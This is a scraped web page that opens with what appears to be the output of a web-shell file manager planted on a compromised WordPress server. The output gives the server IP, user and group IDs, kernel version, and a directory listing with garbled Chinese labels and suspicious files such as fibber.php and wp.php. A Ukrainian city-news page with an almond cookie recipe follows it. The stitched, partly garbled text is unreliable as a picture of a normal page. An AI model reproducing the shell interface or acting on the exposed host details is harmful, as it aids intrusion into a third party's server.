195.16.88.9 - Linux - whoami(krist287) - uid(1574) gid(1676)
kaylin

·

ϴΪ
ϼĿ¼ʱ޸ʱ
_.well-knownɾ 07552022-07-26 20:57:462022-04-19 08:48:45-
_ldɾ 07552022-07-26 20:55:402022-04-18 21:30:13-
_puɾ 07552022-08-12 22:04:542022-08-12 22:04:54-
doskaɾ 07552022-07-26 20:57:462022-05-13 00:21:36-
gboɾ 07552022-07-26 20:55:422022-04-21 16:29:19-
katalogɾ 07552022-07-26 20:55:422022-05-13 00:20:58-
nailɾ 07552022-07-26 20:55:502022-06-17 13:21:44-
testɾ 07552022-07-26 20:55:422022-04-18 15:34:19-
wakenɾ 07552022-08-11 02:53:342022-08-11 02:53:34-
wp-adminɾ 07552022-08-11 06:04:242022-08-11 06:04:24-
wp-contentɾ 07552022-08-13 06:32:242022-08-13 06:32:24-
wp-includesɾ 07552022-07-26 20:55:502022-04-18 17:42:24-
.htaccess 04442022-08-11 06:04:352022-08-11 06:04:3521.22 K
Damiendep 06442022-08-11 03:43:202022-08-11 03:43:209.20 K
fibber.php 06442022-08-11 01:48:402022-08-11 01:48:4016.68 K
google5f28cd50ed83a936.html 06442022-07-26 20:55:422022-04-24 10:15:3853 B
index.php 04442022-08-13 06:32:362022-04-18 20:09:526.33 K
license.txt 06442022-07-26 20:57:462022-04-18 20:09:5219.45 K
readme.html 06442022-07-26 20:55:502022-04-18 20:10:487.26 K
robots.txt 06442022-08-11 03:34:222022-08-11 03:34:22193 B
wp-activate.php 06442022-08-13 03:49:572022-04-18 20:09:527.00 K
wp-blog-header.php 06442022-08-12 19:04:052022-04-18 20:09:52351 B
wp-comments-post.php 06442022-07-26 20:55:502022-04-18 20:10:362.28 K
wp-config-sample.php 06442022-07-26 20:55:392022-04-18 20:10:482.93 K
wp-config.php 06442022-08-13 03:24:292022-04-18 20:09:523.69 K
wp-cron.php 06442022-08-13 06:31:342022-04-18 20:09:523.85 K
wp-links-opml.php 06442022-08-13 04:05:342022-04-18 20:09:522.44 K
wp-load.php 06442022-08-13 01:45:032022-04-18 20:09:523.81 K
wp-login.php 06442022-08-13 06:26:562022-04-18 20:09:5246.79 K
wp-mail.php 06442022-08-13 01:06:122022-04-18 20:09:528.38 K
wp-settings.php 06442022-07-26 20:55:502022-04-18 20:10:3622.49 K
wp-signup.php 06442022-08-13 01:28:282022-04-18 20:09:5231.21 K
wp-trackback.php 06442022-08-13 01:10:262022-04-18 20:09:524.64 K
wp.php 06442022-08-11 01:49:212022-08-11 01:49:21453 B
xmlrpc.php 06442022-08-13 06:29:002022-04-18 20:09:523.16 K
Ŀ¼[12] - ļ[23] - [0755]
Linux sr47.hostlife.net 3.10.0-962.3.2.lve1.5.49.el6h.x86_64 #1 SMP Thu Mar 4 07:40:03 EST 2021 x86_64
Apache/2
Ароматне печиво з мигдалем – смачний десерт під каву або чай – Це Бориспіль – сайт міста Бориспіль
loader image
- Юна Українка подарувала Бориспільським кінологам «крилату конячку» яка виконує бажання. Днями, співробітники Кінологічного центру поліції Борисполя, які разом із ЗСУ та ТРО боронять рубежі Броварів, отримали цінний подарунок. Про це повідомляє прес-служба Кінологічного центру поліції в Київській області. Для наших відважних воїнів юна українка намалювала ліс, мирне небо та крилату конячку. За словами художниці, лоша здатне виконувати бажання. Варто лише доторкнутися до нього та подумати про те, чого хочеться найбільше. Картину юної мисткині передали на місце дислокації оборонців Берегині-волонтерки, які вже тривалий час докладають надлюдських зусиль аби забезпечувати воїнів усім необхідним. За бажанням авторки витвір потрапив саме до поліцейських кінологів. -
Меню Закрити

Ароматне печиво з мигдалем – смачний десерт під каву або чай

/ 5. оценок:

Оценок пока нет. Поставьте оценку первым.

Сьогодні приготуємо хрустке, легке, смачне італійське печиво – Кантучіні, яке неймовірно популярне на просторах Тоскани. Там його смакують до вина, у нас же воно прекрасно підходить до улюбленої кави або чаю. До речі, подейкують, що воно може зберігатися до 3-4 місяців. З особистого досвіду можу сказати, розходиться за 5 хвилин.

Що вам знадобиться?
– Мигдаль – 100 г
– Журавлина – 100 г
– Борошно – 500 г
– Цукор – 200 г
– Масло вершкове – 70 г
– Молоко – 70 мл
– Яйця – 3 шт
– Розпушувач – 8 г
– Сіль – щіпка
– Цедра 1 лимону.

Процес приготування:
1. Висипаємо борошно в ємність, додаємо цукор, розпушувач і дрібку солі. Туди ж відправляємо масло, цедру лимона і молоко.
2. Вимішуємо гарненько тісто.
3. Розкачуємо тісто в невеликий млинець, товщиною 1 см.
4. На тісто викладаємо мигдаль, журавлину і формуємо з отриманої маси товсту ковбаску.
5. Тісто ділимо на 4 частини і також з кожної формуємо ковбаски.
6. Викладаємо ковбаски на деко, застелене пергаментом і відправляємо в духовку на 30 хвилин при температурі 180С.
7. Дістаємо, ріжемо на дольки і ще раз відправляємо в духовку на 5-7 хвилин, щоб наше печиво трохи підсушити.

Час приготування: 45 хвилин.

Маленький лайфхак: щоб зменшити калорійність, зменшіть кількість цукру, а пшеничне борошно замініть на вівсяну.

Якщо вам ніколи читати, ось ловіть відео рецепт ароматного печива з мигдалем

Переглядів:: 1
Share on facebook
Share on telegram
Share on twitter
guest
0 коментарiв
Межтекстовые Отзывы
Посмотреть все комментарии
Авторизація
*
*
Генерація паролю
0
Оставьте комментарий! Напишите, что думаете по поводу статьи.x
()
x